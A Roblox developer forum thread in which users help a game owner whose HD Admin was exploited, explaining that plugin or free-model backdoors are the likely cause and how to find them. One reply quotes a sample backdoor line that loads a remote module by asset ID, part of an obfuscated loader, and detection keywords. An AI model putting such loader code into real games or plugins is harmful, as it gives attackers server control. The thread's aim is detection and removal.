HD admin , hackers get owner powers

ElusiveEpix · November 12, 2020, 4:11pm

Either being caused by an insecure remote or a serverside backdoor. (would probably be the latter)
Backdoors are caused by infected free models or plugins.
(Don’t freak out, removal is as easy as 1, 2, 3!)
Go through your plugins, and see if one is not created by a trusted source.
(With the BTRoblox extension, you can easily view source code of plugins)
If there is an infected one, it will probably look something like

getfenv()[string.reverse("\101\114\105\117\113\101\114")](5723263360)

or some obfuscated code that looks like

return(function(lIIIllIIIllIIlllllIllIl,IIIlIIIlllllIl,IIIlIllIIIIlllIIlI)local lIIllIlIII=string.char;local IlIllIIlllllIIIll=string.sub;local lIIlIIIllIllIIllIlIlIlIII=table.concat;local lIIlIIllII=math.ldexp;

It looks intimidating, but it’s really just hiding the script through a bunch of strange encryption.

Key things to look for are: getfenv, require, string.reverse
If you find a plugin that has this, simply remove it.

If there is not a plugin that has that, look for the same stuff by going through scripts in your explorer.
(A common technique to hide the malicious code is to spam whitespace and hide it to the far right of the script, so make sure you are checking there as well!)

Edit: It’s also very possible that your version of HD admin is not the official one and contains a backdoor in itself. (thanks for Dusk_ie for pointing this out)

Edit 2: If it’s not caused by the admin itself, make sure to go through the steps I showed above.

CoderHusk · November 12, 2020, 4:20pm

Actually when using sha or any hash algorithm you cannot derive it. It isnt a pure function that is what makes it so special, there isnt really a equation other than the exact value you gave it

Duskie_Dark · November 12, 2020, 4:22pm

Not sure why it hasn’t already been suggested but it’s possible your version of HD admin is not the official one and contains a backdoor. Make sure you get the official version of HD admin. Alternatively, try using a different suite (I prefer Adonis personally).

If these exploits are indeed still occurring after you’ve removed the admin then there is likely a backdoor script elsewhere in the game.

MalosVindictus · November 12, 2020, 4:26pm

Alright it was plagued with old 2008 viruses which I removed, and then I found a few backdoors. They’re removed now.

Alright game should be good now. Let me know if the problem persists. @prohriday

prohriday · November 12, 2020, 4:31pm

oh ok lets try and ty for helping means alot

Zivao · November 12, 2020, 4:41pm

You have a server sided backdoor in your game. HD admin among other vulnerable admin systems can grant permissions from the server. I believe this is done via the _G.HDAdminMain ‘PlayerData’ module.

MalosVindictus · November 12, 2020, 5:01pm

No problem dude, glad I could help.

minkmink · November 12, 2020, 5:06pm

“encrypting data on the client” is more than misleading, you’re just obfuscating things, clients have access to all replicated data
tldr;
if possible, don’t use third party scripts, delete all scripts that you don’t know the origin of, put server-side scripts in server script service, the scripts are invisible to clients there

prohriday · November 12, 2020, 5:06pm

ok thank you for the help i appriciate it

haba_nero · November 12, 2020, 5:06pm

Make a server side admin powers that use chat instead of GUIs and events. You can learn about the differences here:

And here is some info on how hackers do this:

MalosVindictus · November 12, 2020, 7:13pm

server script code is invisible regardless of where it is.

Matthais5 · November 12, 2020, 7:24pm

I might be insane but I’m pretty sure exploiters can see what exactly is being sent over their remotes, rendering this useless.

CoderHusk · November 12, 2020, 7:26pm

Again, dynamic keys will change it meaning that they might be able to see it but not able to use it again

Matthais5 · November 12, 2020, 7:29pm

But then how does the client know the key? Unless you’re using this purely for a password thing (i.e. client sends password and server checks) in which case hashing is useless.

iccletus · November 13, 2020, 12:21am

Hey @prohriday!

I have seen this many times before in games.
Due to this I have got fired in a game.

Sadly there is no fix to this. Unless you make a script where if the script detects there is a cheat/exploit they get IP banned so their IP is banned so they can’t join on alternate accounts.

You could also try removing HD Admin and use different admin, or make your own admin.
I hope I could help. I will see you soon

Syclya · November 13, 2020, 12:36am

There was/is a exploit that could spoof usernames, exploiters could change their names ingame.

If your admin system was based on usernames, then any exploiter could give themselves admin powers, use userid instead.

However if this is not the case, then someone might have been given out powers.

iccletus · November 13, 2020, 12:38am

As he said, the exploiters got OWNER admin. and nobody can give owner admin. Not even the original owner.

Syclya · November 13, 2020, 12:39am

Then this is an issue with the admin he is using.
Perhaps it is not secure enough as they can give themselves that type of power.

iccletus · November 13, 2020, 12:42am

yeah, I have seen people giving themself Owner. And first time I saw I was very confused. and I was like so he is the owner??? but no. it was exploits. HD admin isnt so great and anyone can become owner for 20 dollars.

Nobody has really solved this issue.

Syclya · November 13, 2020, 12:44am

That sounds great, unfortunately not for the owner.
As I always say: never trust the client.

Something the owner of this admin does as there is NO way the exploiter can add himself to the admin script unless there was something controlling it via the client-side.

The server-script’s bytecode is never sent to the client.